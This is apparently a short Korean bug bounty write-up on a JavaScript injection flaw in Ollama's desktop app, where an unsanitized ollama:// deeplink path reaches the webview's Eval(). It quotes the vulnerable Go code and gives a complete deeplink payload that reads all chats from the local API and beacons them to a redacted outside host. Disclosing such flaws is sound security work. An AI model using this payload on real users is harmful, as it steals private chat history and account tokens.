-
Ollama, Javascript Injection via DeeplinkBug Bounty 2026. 3. 23. 03:04
https://huntr.com/bounties/d515f43a-c9d9-4e7b-95f6-e05516717f2a
huntr - The world’s first bug bounty platform for AI/ML
huntr.com
// app/cmd/app/webview.go:468-472 } else { w.webview.Eval(fmt.Sprintf(` history.pushState({}, '', '%s'); `, path)) showWindow(w.webview.Window()) }1. ollama:// 딥링크에서 경로를 sanitize 하지 않고 Eval()에 사용함
2. 때문에 ollama webview 위에서 임의의 자바스크립트 실행 가능
3. ollama는 로컬에 11434로 웹서버를 띄워서 api를 제공함
4. JS로 로컬 chat api를 찔러서 지난 채팅기록 모두 가져오기 가능, 계정 토큰 가져올 수 있음
ollama:///x');var data={chats:[]};fetch('//127.0.0.1:'+location.port+'/api/v1/chats').then(r=>r.json()).then(result=>{var chatPromises=result.chatInfos.map(c=>fetch('//127.0.0.1:'+location.port+'/api/v1/chat/'+c.id).then(r=>r.json()));return Promise.all(chatPromises)}).then(fullChats=>{data.chats=fullChats;navigator.sendBeacon('//REDACTED/full',JSON.stringify(data));});/////////'Bug Bounty' 카테고리의 다른 글
NextCloud Desktop, Credential Disclosure via Unvalidated directDownloadUrl (0) 2026.04.14 Arbitrary file write via tarslip in esm.sh (CVE-2025-65025) (0) 2025.11.19 JS Template Literal Injection in esm.sh (CVE-2025-65026) (0) 2025.11.19 Command Injection in pgAdmin for Windows (CVE-2025-12763) (0) 2025.11.19 Langfuse Server Side Request Forgery(SSRF) (0) 2025.08.31 댓글